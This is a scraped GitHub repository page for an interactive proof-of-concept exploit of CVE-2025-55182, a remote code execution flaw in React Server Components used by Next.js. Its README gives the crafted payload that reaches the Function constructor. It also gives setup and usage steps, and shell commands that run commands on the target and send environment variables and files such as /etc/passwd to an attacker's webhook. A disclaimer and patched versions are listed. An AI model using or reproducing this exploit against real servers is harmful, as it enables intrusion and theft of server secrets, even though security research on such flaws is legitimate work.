Skip to content

NathanJ60/react2shell-interactive

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
.gitignore
.gitignore
 
 
README.md
README.md
 
 
exploit.js
exploit.js
 
 
package-lock.json
package-lock.json
 
 
package.json
package.json
 
 

Repository files navigation

React2Shell - CVE-2025-55182 Interactive PoC

Interactive shell for exploiting CVE-2025-55182, a Remote Code Execution vulnerability in React Server Components.

Disclaimer

This tool is provided for EDUCATIONAL and AUTHORIZED SECURITY TESTING purposes only.

  • Only use on systems you own or have explicit written permission to test
  • Unauthorized access to computer systems is illegal
  • The author is not responsible for any misuse of this tool
  • This is a proof-of-concept for security research and awareness

Vulnerability Overview

CVE-2025-55182 affects React Server Components (RSC) in:

  • Next.js < 15.1.7, < 14.2.29, < 13.5.9
  • Waku (various versions)

The vulnerability allows Remote Code Execution (RCE) through malicious payloads sent to Server Actions.

How It Works

  1. The RSC protocol uses $@x syntax to reference internal Chunk objects
  2. JavaScript automatically unwraps objects with .then() methods (Promise-like)
  3. By crafting a malicious payload with controlled _response, _formData, and _prefix properties
  4. The attacker can reach the Function constructor via prototype chain traversal
  5. This allows arbitrary JavaScript execution on the server
$3:constructor:constructor → Function constructor → RCE

Installation

git clone https://github.com/NathanJ60/react2shell-interactive.git
cd react2shell-interactive
npm install

Configuration

Edit exploit.js and update these values:

const TARGET_URL = 'http://localhost:3000/'          // Vulnerable Next.js server
const WEBHOOK_URL = 'https://webhook.site/YOUR-ID'   // Your webhook URL

Get a free webhook at: https://webhook.site

Usage

node exploit.js

Commands

Command Description
!test Test if exploit works (sends confirmation to webhook)
!env Exfiltrate environment variables (process.env)
!js <code> Execute custom JavaScript
!help Show help
!exit Exit
<command> Execute shell command (e.g., whoami, ls, cat /etc/passwd)

Example Session

react2shell> !test
[+] Sent! Check webhook

react2shell> whoami
[+] Sent: whoami

react2shell> ls -la
[+] Sent: ls -la

react2shell> !env
[+] Sent! Check webhook for env vars

Results appear on your webhook, not in the terminal.

Technical Details

Payload Structure

{
    '0': '$1',
    '1': {
        'status': 'resolved_model',
        'reason': 0,
        '_response': '$4',
        'value': '{"then":"$3:map","0":{"then":"$B3"},"length":1}',
        'then': '$2:then'
    },
    '2': '$@3',
    '3': [],
    '4': {
        '_prefix': '<JAVASCRIPT_CODE>//',
        '_formData': { 'get': '$3:constructor:constructor' },
        '_chunks': '$2:_response:_chunks'
    }
}

Execution Flow

  1. Payload is sent as multipart form data with next-action header
  2. React Flight parser processes the chunks
  3. $@3 creates a Chunk reference
  4. $3:constructor:constructor traverses to Function
  5. _prefix content is passed to Function() and executed

Notes for Next.js 15+

  • Uses ESM modules, so require() is not available
  • Use dynamic import() instead: 
    import("child_process").then(cp => cp.execSync("whoami"))

Patched Versions

Update to these versions to fix the vulnerability:

  • Next.js >= 15.1.7
  • Next.js >= 14.2.29
  • Next.js >= 13.5.9

References

License

MIT License - For educational purposes only.

Author

Security Research PoC - Use responsibly.

About

CVE-2025-55182 Interactive PoC - React Server Components RCE - Educational Security Research

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages